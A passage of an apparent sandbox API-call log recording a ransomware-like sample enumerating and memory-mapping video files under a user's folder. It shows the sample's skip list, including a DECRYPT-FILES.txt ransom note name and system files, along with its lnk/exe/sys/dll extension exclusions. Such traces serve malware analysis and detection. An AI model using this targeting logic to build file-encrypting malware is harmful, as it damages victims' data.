1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="ntuser.dat.log") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="thumbs.db") returned 1 [0186.240] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv.Ud6R", lpString2="Bootfont.bin") returned 1 [0186.240] lstrlenW (lpString="xgEKJiGuAv6jN.flv.Ud6R") returned 22 [0186.240] lstrcmpiW (lpString1="Ud6R", lpString2="lnk") returned 1 [0186.240] lstrcmpiW (lpString1="Ud6R", lpString2="exe") returned 1 [0186.240] lstrcmpiW (lpString1="Ud6R", lpString2="sys") returned 1 [0186.240] lstrcmpiW (lpString1="Ud6R", lpString2="dll") returned 1 [0186.240] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.240] lstrlenW (lpString="xgEKJiGuAv6jN.flv.Ud6R") returned 22 [0186.240] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.240] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="xgEKJiGuAv6jN.flv.Ud6R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv.Ud6R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv.Ud6R" [0186.240] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv.Ud6R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgekjiguav6jn.flv.ud6r"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.241] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=28198) returned 1 [0186.241] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.241] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.242] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.242] CloseHandle (hObject=0x268) returned 1 [0186.242] CloseHandle (hObject=0x264) returned 1 [0186.242] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.242] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97860b80, ftCreationTime.dwHighDateTime=0x1d4d145, ftLastAccessTime.dwLowDateTime=0x39856df0, ftLastAccessTime.dwHighDateTime=0x1d4d21c, ftLastWriteTime.dwLowDateTime=0xb07479e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7e09, dwReserved0=0x0, dwReserved1=0x0, cFileName="XgwIp2mS.mkv.vIqcZ", cAlternateFileName="XGWIP2~1.VIQ")) returned 1 [0186.242] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="DECRYPT-FILES.txt") returned 1 [0186.242] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="autorun.inf") returned 1 [0186.242] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="boot.ini") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="desktop.ini") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="ntuser.dat") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="iconcache.db") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="bootsect.bak") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="ntuser.dat.log") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="thumbs.db") returned 1 [0186.243] lstrcmpiW (lpString1="XgwIp2mS.mkv.vIqcZ", lpString2="Bootfont.bin") returned 1 [0186.243] lstrlenW (lpString="XgwIp2mS.mkv.vIqcZ") returned 18 [0186.243] lstrcmpiW (lpString1="vIqcZ", lpString2="lnk") returned 1 [0186.243] lstrcmpiW (lpString1="vIqcZ", lpString2="exe") returned 1 [0186.243] lstrcmpiW (lpString1="vIqcZ", lpString2="sys") returned 1 [0186.243] lstrcmpiW (lpString1="vIqcZ", lpString2="dll") returned 1 [0186.243] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.243] lstrlenW (lpString="XgwIp2mS.mkv.vIqcZ") returned 18 [0186.243] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.243] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="XgwIp2mS.mkv.vIqcZ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv.vIqcZ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv.vIqcZ" [0186.243] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.243] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv.vIqcZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgwip2ms.mkv.viqcz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.243] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=32265) returned 1 [0186.244] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.244] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.246] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.246] CloseHandle (hObject=0x268) returned 1 [0186.246] CloseHandle (hObject=0x264) returned 1 [0186.246] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.246] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x796154a0, ftCreationTime.dwHighDateTime=0x1d4c977, ftLastAccessTime.dwLowDateTime=0x14105f90, ftLastAccessTime.dwHighDateTime=0x1d4cb95, ftLastWriteTime.dwLowDateTime=0xb0793ca0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1622, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", cAlternateFileName="Z2FHCK~1.M1B")) returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="DECRYPT-FILES.txt") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="autorun.inf") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="boot.ini") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="desktop.ini") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="ntuser.dat") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="iconcache.db") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="bootsect.bak") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="ntuser.dat.log") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="thumbs.db") returned 1 [0186.246] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi.m1BRw0", lpString2="Bootfont.bin") returned 1 [0186.246] lstrlenW (lpString="z2fHcKc4CW0Oah1eKV.avi.m1BRw0") returned 29 [0186.246] lstrcmpiW (lpString1="m1BRw0", lpString2="lnk") returned 1 [0186.246] lstrcmpiW (lpString1="m1BRw0", lpString2="exe") returned 1 [0186.246] lstrcmpiW (lpString1="m1BRw0", lpString2="sys") returned -1 [0186.246] lstrcmpiW (lpString1="m1BRw0", lpString2="dll") returned 1 [0186.246] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.246] lstrlenW (lpString="z2fHcKc4CW0Oah1eKV.avi.m1BRw0") returned 29 [0186.246] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.247] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="z2fHcKc4CW0Oah1eKV.avi.m1BRw0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi.m1BRw0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi.m1BRw0" [0186.247] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi.m1BRw0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\z2fhckc4cw0oah1ekv.avi.m1brw0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.247] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=5666) returned 1 [0186.247] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.247] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.248] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.248] CloseHandle (hObject=0x268) returned 1 [0186.248] CloseHandle (hObject=0x264) returned 1 [0186.248] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.248] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc38b05f0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0x754d4670, ftLastAccessTime.dwHighDateTime=0x1d4c98c, ftLastWriteTime.dwLowDateTime=0xb07b9e00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa2ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", cAlternateFileName="_VYZ3T~1.DMT")) returned 1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="DECRYPT-FILES.txt") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="autorun.inf") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="boot.ini") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="desktop.ini") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="ntuser.dat") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="iconcache.db") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="bootsect.bak") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="ntuser.dat.log") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="thumbs.db") returned -1 [0186.248] lstrcmpiW (lpString1="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", lpString2="Bootfont.bin") returned -1 [0186.248] lstrlenW (lpString="_vYz 3tjCOF gW2pru4f.mkv.DMTLca") returned 31 [0186.249] lstrcmpiW (lpString1="DMTLca", lpString2="lnk") returned -1 [0186.249] lstrcmpiW (lpString1="DMTLca", lpString2="exe") returned -1 [0186.249] lstrcmpiW (lpString1="DMTLca", lpString2="sys") returned -1 [0186.249] lstrcmpiW (lpString1="DMTLca", lpString2="dll") returned 1 [0186.249] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0186.249] lstrlenW (lpString="_vYz 3tjCOF gW2pru4f.mkv.DMTLca") returned 31 [0186.249] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0186.249] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="_vYz 3tjCOF gW2pru4f.mkv.DMTLca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv.DMTLca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv.DMTLca" [0186.249] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\_vYz 3tjCOF gW2pru4f.mkv.DMTLca" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\_vyz 3tjcof gw2pru4f.mkv.dmtlca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.249] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=41644) returned 1 [0186.249] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.249] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.250] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.250] CloseHandle (hObject=0x268) returned 1 [0186.250] CloseHandle (hObject=0x264) returned 1 [0186.250] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.251] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc38b05f0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0x754d4670, ftLastAccessTime.dwHighDateTime=0x1d4c98c, ftLastWriteTime.dwLowDateTime=0xb07b9e00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa2ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="_vYz 3tjCOF gW2pru4f.mkv.DMTLca", cAlternateFileName="_VYZ3T~1.DMT")) returned 0 [0186.251] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.251] CloseHandle (hObject=0x25c) returned 1 [0186.251] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1910e90, ftCreationTime.dwHighDateTime=0x1d4d0a0, ftLastAccessTime.dwLowDateTime=0x923a7ed0, ftLastAccessTime.dwHighDateTime=0x1d4ced5, ftLastWriteTime.dwLowDateTime=0xb08060c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QxFS.mp4.GoBv", cAlternateFileName="QXFSMP~1.GOB")) returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="DECRYPT-FILES.txt") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="autorun.inf") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="boot.ini") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="desktop.ini") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="ntuser.dat") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="iconcache.db") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="bootsect.bak") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="ntuser.dat.log") returned 1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="thumbs.db") returned -1 [0186.251] lstrcmpiW (lpString1="QxFS.mp4.GoBv", lpString2="Bootfont.bin") returned 1 [0186.251] lstrlenW (lpString="QxFS.mp4.GoBv") returned 13 [0186.251] lstrcmpiW (lpString1="GoBv", lpString2="lnk") returned -1 [0186.251] lstrcmpiW (lpString1="GoBv", lpString2="exe") returned 1 [0186.251] lstrcmpiW (lpString1="GoBv", lpString2="sys") returned -1 [0186.251] lstrcmpiW (lpString1="GoBv", lpString2="dll") returned 1 [0186.251] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.251] lstrlenW (lpString="QxFS.mp4.GoBv") returned 13 [0186.251] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.251] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="QxFS.mp4.GoBv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4.GoBv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4.GoBv" [0186.251] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.252] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QxFS.mp4.GoBv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qxfs.mp4.gobv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.252] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=2854) returned 1 [0186.252] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.252] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.253] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.253] CloseHandle (hObject=0x260) returned 1 [0186.253] CloseHandle (hObject=0x25c) returned 1 [0186.253] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.253] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb52c05c0, ftCreationTime.dwHighDateTime=0x1d4cd3c, ftLastAccessTime.dwLowDateTime=0x886fa1b0, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0xb082c220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6b70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r6V0OBcF8C5j1Z.mkv.cSTS", cAlternateFileName="R6V0OB~1.CST")) returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="DECRYPT-FILES.txt") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="autorun.inf") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="boot.ini") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="desktop.ini") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="ntuser.dat") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="iconcache.db") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="bootsect.bak") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="ntuser.dat.log") returned 1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="thumbs.db") returned -1 [0186.253] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv.cSTS", lpString2="Bootfont.bin") returned 1 [0186.253] lstrlenW (lpString="r6V0OBcF8C5j1Z.mkv.cSTS") returned 23 [0186.253] lstrcmpiW (lpString1="cSTS", lpString2="lnk") returned -1 [0186.253] lstrcmpiW (lpString1="cSTS", lpString2="exe") returned -1 [0186.254] lstrcmpiW (lpString1="cSTS", lpString2="sys") returned -1 [0186.255] lstrcmpiW (lpString1="cSTS", lpString2="dll") returned -1 [0186.255] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0186.255] lstrlenW (lpString="r6V0OBcF8C5j1Z.mkv.cSTS") returned 23 [0186.255] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0186.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="r6V0OBcF8C5j1Z.mkv.cSTS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv.cSTS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv.cSTS" [0186.255] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv.cSTS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6v0obcf8c5j1z.mkv.csts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.255] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=27504) returned 1 [0186.255] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.255] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.256] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.256] CloseHandle (hObject=0x260) returned 1 [0186.256] CloseHandle (hObject=0x25c) returned 1 [0186.256] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.256] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f9a930, ftCreationTime.dwHighDateTime=0x1d4c899, ftLastAccessTime.dwLowDateTime=0x6c821830, ftLastAccessTime.dwHighDateTime=0x1d4cc67, ftLastWriteTime.dwLowDateTime=0xb08784e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tBOJG0lIg.flv.b5kZV", cAlternateFileName="TBOJG0~1.B5K")) returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="DECRYPT-FILES.txt") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="autorun.inf") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="boot.ini") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="desktop.ini") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="ntuser.dat") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="iconcache.db") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="bootsect.bak") returned 1 [0186.257] lstrcmpiW (lpString1="tBOJG0lIg.flv.b5kZV", lpString2="ntuser.dat.log") returned 1 [0186.257] lstrcmpiW 